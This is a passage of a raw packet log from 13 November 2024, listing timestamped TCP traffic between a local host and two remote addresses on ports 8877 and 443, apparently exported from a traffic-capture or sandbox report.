                                                                                                                                                          Nov 13, 2024 11:00:41.634910107 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.634924889 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:41.634943962 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.634982109 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.634984016 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:41.634984016 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:41.635029078 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:41.635536909 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.635592937 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:41.635593891 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.635627985 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.635643959 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:41.635663986 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.635669947 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:41.635700941 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:41.753716946 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.753773928 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.753815889 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.753849983 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.753885984 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.753909111 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:41.753920078 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.753946066 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:41.753946066 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:41.753957033 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.753966093 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:41.753992081 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.754000902 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:41.754026890 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.754034042 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:41.754060984 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.754069090 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:41.754097939 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.754102945 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:41.754143953 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:41.754219055 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.754271984 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:41.754275084 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.754311085 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.754323006 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:41.754344940 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.754368067 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:41.754378080 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:41.754379988 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.754421949 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:41.754795074 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.754847050 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:41.754851103 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.754884958 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.754915953 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:41.754915953 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:41.872483015 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.872555017 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.872592926 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.872627020 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.872680902 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.872714996 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.872749090 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.872781992 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.872778893 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:41.872778893 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:41.872821093 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.872872114 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:41.872872114 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:41.872872114 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:41.873871088 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.873904943 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.873941898 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:41.873941898 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:41.873959064 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.873992920 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.874006033 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:41.874027014 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.874030113 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:41.874059916 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.874078035 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:41.874094009 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.874099970 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:41.874149084 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.874183893 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.874217033 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.874221087 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:41.874221087 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:41.874221087 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:41.874258041 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:41.992835045 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.992893934 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.992932081 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.992934942 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:41.992934942 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:41.992997885 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.993182898 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:01:12.273261070 CET497058877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:01:12.587358952 CET497058877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:01:12.592381954 CET88774970580.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:01:12.592433929 CET497058877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:01:12.592437029 CET88774970580.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:01:25.118254900 CET580858877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:01:25.123188972 CET88775808580.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:01:25.123296022 CET580858877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:01:25.123575926 CET580858877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:01:25.128340960 CET88775808580.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:01:32.972527981 CET88775808580.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:01:32.972654104 CET580858877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:01:32.973151922 CET580858877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:01:32.977952003 CET88775808580.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:01:32.978008032 CET580858877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:01:32.982848883 CET88775808580.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:01:51.033907890 CET88775808580.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:01:51.034327030 CET580858877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:02:03.096438885 CET58086443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:03.096501112 CET44358086172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:03.096558094 CET58086443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:03.096884012 CET58086443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:03.096894979 CET44358086172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:03.714534998 CET44358086172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:03.714624882 CET58086443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:03.747946978 CET58086443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:03.747997046 CET44358086172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:03.748402119 CET44358086172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:03.751991987 CET58086443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:03.752566099 CET58086443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:03.795340061 CET44358086172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:05.734975100 CET44358086172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:05.735120058 CET44358086172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:05.735279083 CET58086443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:05.747689962 CET58086443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:05.747708082 CET44358086172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:06.650965929 CET58087443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:06.651071072 CET44358087172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:06.651571035 CET58087443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:06.651870966 CET58087443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:06.651891947 CET44358087172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:07.268204927 CET44358087172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:07.268279076 CET58087443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:07.268759012 CET58087443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:07.268771887 CET44358087172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:07.270546913 CET58087443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:07.270551920 CET44358087172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:09.570720911 CET44358087172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:09.570785999 CET44358087172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:09.570822954 CET58087443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:09.570884943 CET58087443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:09.576571941 CET58087443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:09.576600075 CET44358087172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:09.662058115 CET58088443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:09.662101984 CET44358088172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:09.662210941 CET58088443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:09.663336039 CET58088443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:09.663351059 CET44358088172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:10.281301975 CET44358088172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:10.283736944 CET58088443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:10.291920900 CET58088443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:10.291930914 CET44358088172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:10.295336962 CET58088443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:10.295344114 CET44358088172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:12.418210983 CET44358088172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:12.418278933 CET44358088172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:12.420222044 CET58088443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:12.440248966 CET58088443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:12.440263987 CET44358088172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:12.547938108 CET58089443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:12.547980070 CET44358089172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:12.548075914 CET58089443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:12.549000978 CET58089443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:12.549016953 CET44358089172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:13.168234110 CET44358089172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:13.168298960 CET58089443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:13.168693066 CET58089443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:13.168698072 CET44358089172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:13.169651985 CET58089443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:13.169656992 CET44358089172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:15.758476019 CET44358089172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:15.758550882 CET44358089172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:15.758552074 CET58089443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:15.758939028 CET58089443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:15.776212931 CET58089443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:15.776240110 CET44358089172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:15.862509012 CET58090443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:15.862551928 CET44358090172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:15.862720966 CET58090443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:15.863120079 CET58090443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:15.863137960 CET44358090172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:16.481421947 CET44358090172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:16.484076977 CET58090443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:16.485452890 CET58090443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:16.485452890 CET58090443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:16.485460043 CET44358090172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:16.485474110 CET44358090172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:19.443041086 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:19.443067074 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:19.443078041 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:19.443140984 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:02:19.443140984 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:02:19.443141937 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:02:19.491358042 CET44358090172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:19.491410017 CET44358090172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:19.491472006 CET58090443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:19.491504908 CET58090443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:19.495697021 CET58090443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:19.495712042 CET44358090172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:19.573832989 CET58091443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:19.573863983 CET44358091172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:19.574023962 CET58091443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:19.574364901 CET58091443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:19.574372053 CET44358091172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:20.184325933 CET44358091172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:20.188076973 CET58091443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:20.189424038 CET58091443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:20.189424038 CET58091443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:20.189433098 CET44358091172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:20.189481974 CET44358091172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:22.228959084 CET44358091172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:22.229016066 CET44358091172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:22.229074955 CET58091443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:22.239542007 CET58091443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:22.239562988 CET44358091172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:22.358328104 CET58092443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:22.358369112 CET44358092172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:22.359467030 CET58092443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:22.359946966 CET58092443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:22.359961987 CET44358092172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:22.999387980 CET44358092172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:22.999985933 CET58092443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:23.043447018 CET58092443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:23.043458939 CET44358092172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:23.044975996 CET58092443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:23.044980049 CET44358092172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:24.993869066 CET44358092172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:24.993933916 CET44358092172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:24.993938923 CET58092443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:24.993972063 CET58092443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:25.009768963 CET58092443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:25.009795904 CET44358092172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:25.087730885 CET58093443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:25.087835073 CET44358093172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:25.087913990 CET58093443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:25.088192940 CET58093443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:25.088232994 CET44358093172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:25.685642958 CET44358093172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:25.685710907 CET58093443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:25.693715096 CET58093443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:25.693736076 CET44358093172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:25.743864059 CET58093443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:25.743885994 CET44358093172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:27.739975929 CET44358093172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:27.740144968 CET44358093172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:27.744285107 CET58093443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:27.744286060 CET58093443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:27.851484060 CET58094443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:27.851536036 CET44358094172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:27.851954937 CET58094443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:27.852159977 CET58094443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:27.852176905 CET44358094172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:28.211716890 CET58093443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:28.211793900 CET44358093172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:28.461236954 CET44358094172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:28.465289116 CET58094443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:28.465289116 CET58094443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:28.465289116 CET58094443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:28.465318918 CET44358094172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:28.465339899 CET44358094172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:30.572088003 CET44358094172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:30.572155952 CET44358094172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:30.572177887 CET58094443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:30.576037884 CET58094443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:30.576037884 CET58094443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:30.628361940 CET58095443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:30.628444910 CET44358095172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:30.632036924 CET58095443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:30.635966063 CET58095443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:30.635999918 CET44358095172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:30.882374048 CET58094443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:30.882404089 CET44358094172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:31.244015932 CET44358095172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:31.244082928 CET58095443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:31.244673014 CET58095443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:31.244684935 CET44358095172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:31.246473074 CET58095443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:31.246479034 CET44358095172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:33.251488924 CET44358095172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:33.251619101 CET58095443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:33.251640081 CET44358095172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:33.251692057 CET58095443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:33.251983881 CET58095443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:33.252017021 CET44358095172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:33.369206905 CET58096443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:33.369232893 CET44358096172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:33.369285107 CET58096443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:33.369561911 CET58096443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:33.369570017 CET44358096172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:33.977998972 CET44358096172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:33.980071068 CET58096443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:33.981311083 CET58096443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:33.981311083 CET58096443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:33.981331110 CET44358096172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:33.981365919 CET44358096172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:35.921798944 CET44358096172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:35.921885014 CET44358096172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:35.921982050 CET58096443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:35.922209978 CET58096443192.168.2.8172.67.191.232
